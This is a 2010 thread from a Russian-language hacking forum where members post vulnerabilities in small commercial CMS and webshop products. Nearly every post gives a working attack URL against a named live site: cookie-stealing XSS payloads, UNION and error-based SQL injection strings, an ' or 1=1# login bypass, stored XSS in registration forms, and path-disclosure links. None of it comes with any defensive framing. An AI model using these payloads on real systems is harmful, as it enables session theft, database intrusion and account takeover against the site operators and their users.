ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2010, 03:55
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
intellisite® CMS
Passive XSS
off site: http://www.intellisite.ch/index.php?nav= [XSS]
alert(01010)
+ в Поиске
|
|
|
23.10.2010, 03:46
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Fastpublish CMS 2.0.x
SQL injection
/aufbau/comment.php
Пример:
Код:
Code:
http://www.fastpublish.de/aufbau/comment.php?artikel=106' limit 0 union select 1,0x6465,3,4,5,6,7,8,9,version(),11,12,13,14,15,16 ,17,18,19,0x434d53,21 --+1&popup=true
Путь+USER: http://www.fastpublish.de/aufbau/comment.php?artikel=106
Код:
Code:
wwwrun@localhost
Код:
/www/htdocs/w0081419/Original_Neu/aufbau/comment.php
[/COLOR]
|
|
|
|
25.10.2010, 02:51
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Nexecuttive CMS
офф сайт: http://nexecutive.de/
SQL Injection:
Код:
Code:
http://nexecutive.de/glossar.php?i=glossary&g=showDef&categoryID=16+and+substring(version(),1,1)=3
(3.23.58-log) -версия.
Можно делать UPDATE:
Код:
Code:
http://nexecutive.de/update_nexecutive_db.php
Активная xss:
При регистрации, почти все поля.
Код:
Code:
http://nexecutive.de/index.php?i=register&languCode=de
Пассивная xss:
Код:
Code:
http://nexecutive.de/cms-shop.php?i=nexec_detail&ktID=33&categoryID=48">alert(document.cookie)
и во многих других местах
Путь:
Код:
Code:
http://nexecutive.de/spaw2/dialogs/dialog.php
http://nexecutive.de/logIn_openID.php
http://nexecutive.de/nexeclib/geomarkers.php
http://nexecutive.de/admin_modul/admin_admin.php
http://nexecutive.de/spaw2/spaw.inc.php
|
|
|
|
25.10.2010, 19:24
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
OMECO®webshop 4.0
BLIND SQL INJECTION
Пример:
Сообщение от None
http://shop.omeco.de/item/23/0/0/26/index.omeco?PHPSESSID=5aa879eab916e4eaee5d119db59b 8e88&ARTICLEID=26 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--&COMEFROM=&EVENT=item&ACT=insert&MENGE=1&insertbut ton=Bestellen
Result:
Код:
Code:
Duplicate entry '4.1.221' for key 1
SQL INJECTION AUTHORIZATION BYPASS
Сообщение от None
http://shop.omeco.de/index.omeco?EVENT=showCustomer&scriptMode=order&PH PSESSID=5aa879eab916e4eaee5d119db59b8e88
Ihr Login: ' or 1=1# 1
Passwort: ' or 1=1# 1
Активная xss
При регистрации почти все поля уязвимы
вписуем
Код:
Code:
document.body.innerHTML ="body{ visibility:hidden; }
или что-то другое
OMECO®webcontent CMS
Пассивная xss:
http://www.omeco.de/
В Поиске: ">alert(xss)
|
|
|
|
27.10.2010, 01:36
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
SiteYouSelf CMS
Офф сайт: http://www.siteyourself.de/
xss inj.
Код:
Code:
http://www.siteyourself.de/start.php?sys_suche=aa">alert(document.cookie)&Button.x=19&Button.y=15&seitenid=43&seiteninhaltid=69&langid=1
Путь:
http://www.siteyourself.de/start.php?sys_suche=&Button.x=19&Button.y=15&seite nid=43&seiteninhaltid=-69
|
|
|
|
29.10.2010, 22:19
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Web2Date v7.0
off site: http://www.databecker.de/ 178,50 EUR
Сообщение от None
XSS INJ.
https://www.databecker.de/shop/data-becker-newsletter-center/index.php
E-Mail* - Vorname - Nachname
https://www.databecker.de/pagedb.php?TemplateCategory=Kundenkonto-Gutschein
в Поле: ">alert(document.cookie)
https://www.databecker.de/pagedb.php?TemplateCategory=UsrTpl-newsdienste&mode=unsub">alert(document.cookie)
http://webservices.databecker.de/?Page=ProductChoiceIS
активка
Сообщение от None
Путь:
https://www.databecker.de/shop/s2duser.php?sid[]=
https://www.databecker.de/shop/s2dlogin.php?r[]=
https://www.databecker.de/shop/s2duser.php?m[]=edit&r= (нужно быть авторизованым)
https://www.databecker.de/pagedb.php?d_p=&S2DSESS=-2bf5a6f3d487d21db4330b13c7337bf9 (В Opera)
|
|
|
|
30.11.2010, 03:26
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Xitex WebContent M1 CMS
Платна
офф сайт: http://webcontent-m1.com/
Passive XSS
Код:
Code:
http://webcontent-m1.com/m1/en/buyonline/standard_vs_professional
В поле:
Sign up for free e-newsletter XSS
Please correct you e-mail address
E-mail: alert('xss')
____
Код:
Code:
http://webcontent-m1.com/m1/en/buyonline/trial_version
http://webcontent-m1.com/m1/en/contact_us
http://webcontent-m1.com/m1/en/buyonline/overview
http://webcontent-m1.com/m1/en/send_feedback
Нужно минимум 2 поля заполнить хсс кодом.
">alert(document.cookie)
также фильтра нету никакого т.е можно все заполнить кавычками.
|
|
|
|
01.12.2010, 00:21
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
JobExpert
http://jobexpert.sd-group.org.ua/
XSS
Уязвим параметр currency
Код:
Code:
http://jobexpert.sd-group.org.ua/index.php?ut=competitor&do=search&q=xss&base=vacancy&type=any&id_section=1&id_profession=1t&id_region=1&id_city=1&pay_from=1¤cy=alert('d0s')&period=0&records=10
|
|
|
|
04.12.2010, 04:15
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
CMS.SSPRO
http://www.sspro.ru/
XSS
Код:
Code:
http://www.demo.sspro-soft.ru/?pgid=1&mod=1alert(123)
|
|
|
|
04.12.2010, 23:23
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2359124){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2398339){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2401187){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2401939){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2403922){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2407594){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2450575){kind=avatar}
Похожие темы
Линейный вид
